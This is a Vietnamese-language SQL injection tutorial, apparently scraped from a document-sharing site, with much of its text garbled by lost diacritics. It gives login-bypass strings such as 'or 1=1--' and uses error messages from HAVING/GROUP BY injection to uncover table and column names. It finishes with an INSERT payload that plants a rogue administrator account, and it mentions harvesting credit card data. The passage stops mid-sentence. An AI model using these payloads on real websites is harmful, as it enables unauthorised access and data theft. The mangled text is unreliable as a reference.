Professional Documents
Culture Documents
Kỹ Thuật Attack Một Website
Kỹ Thuật Attack Một Website
CODE
admin'-' or 0=0 -" or 0=0 -or 0=0 -hi or 1=1-y l bc n gin nht ca k thut SQL Injection , tuy nhin i lc s ko c kt
r rng trn 1 trang web li no .
CODE
http://www.sqlsecurity.com/ - Thng tin chung v SQL Security/Injection
http://w3schools.com/sql/default.asp - Hc v tm hiu ngn ng SQL
2> b. SQL Injection - Ly thng tin cc table :
y l 1 k thut cao cp hn v khai thc SQL Injection . Gm 3 bc _ trc tin
chng ta s to ra li trn trang web b SQL Injection tm c nhng table names
( nhm mc ch to mt account c quyn ) . Tip tc chng ta li to thm mt
error khc c c table name quan trng . V cui cng l inject SQL to
admin's account .
c c kt qu cui cng , trc ht trn trang web b li chng ta s login vi
username nh sau :
CODE
Having1=1-Ko in password v nhn enter , chng ta s nhn c mt thng bo li ( error )
vi 1 table name , tng t nh sau :
SQL
Column user_member.user_id is invalid and was not found ....
( lu phn ch tm l v d v table name ) , thng bo error c th di hn nhng
ci quan trng chng ta cn l table name , nh v d trn y l user_member.id
cha thng tin v username , chng ta s thc hin bc tip theo nhm tm thm
cc table name quan trng khc :
SQL
UNION SELECT * FROM user_member WHERE USER_ID=admin GROUP BY
USER_ID HAVING 1=1;-Error nhn c c th nh sau :
QUOTE
Column user_member.user_id is invalid and was not found Column
user_member.passwd is invalid and was not found
v table mi y nhn c l user_member.passwd l table cha password , vy l
chng ta c th thng qua cc table tm c chng ta s to mt account vi cc
c quyn admin :
SQL
INSERT INTO user_member (USER_NAME, LOGIN_ID, PASSWORD,
CREATION_DATE) VALUES(VietLuv,hacked,hacked,GETDATE();-V by gi chng ta c th login vi quyn admin bng username VietLuv v
password hacked .
Trn y ch l cn bn nht v khai thc SQL Injection , cc hacker thng qua SQL
Injection tm cc table cha cc thng tin quan trng nh credit card ...v...v... Cn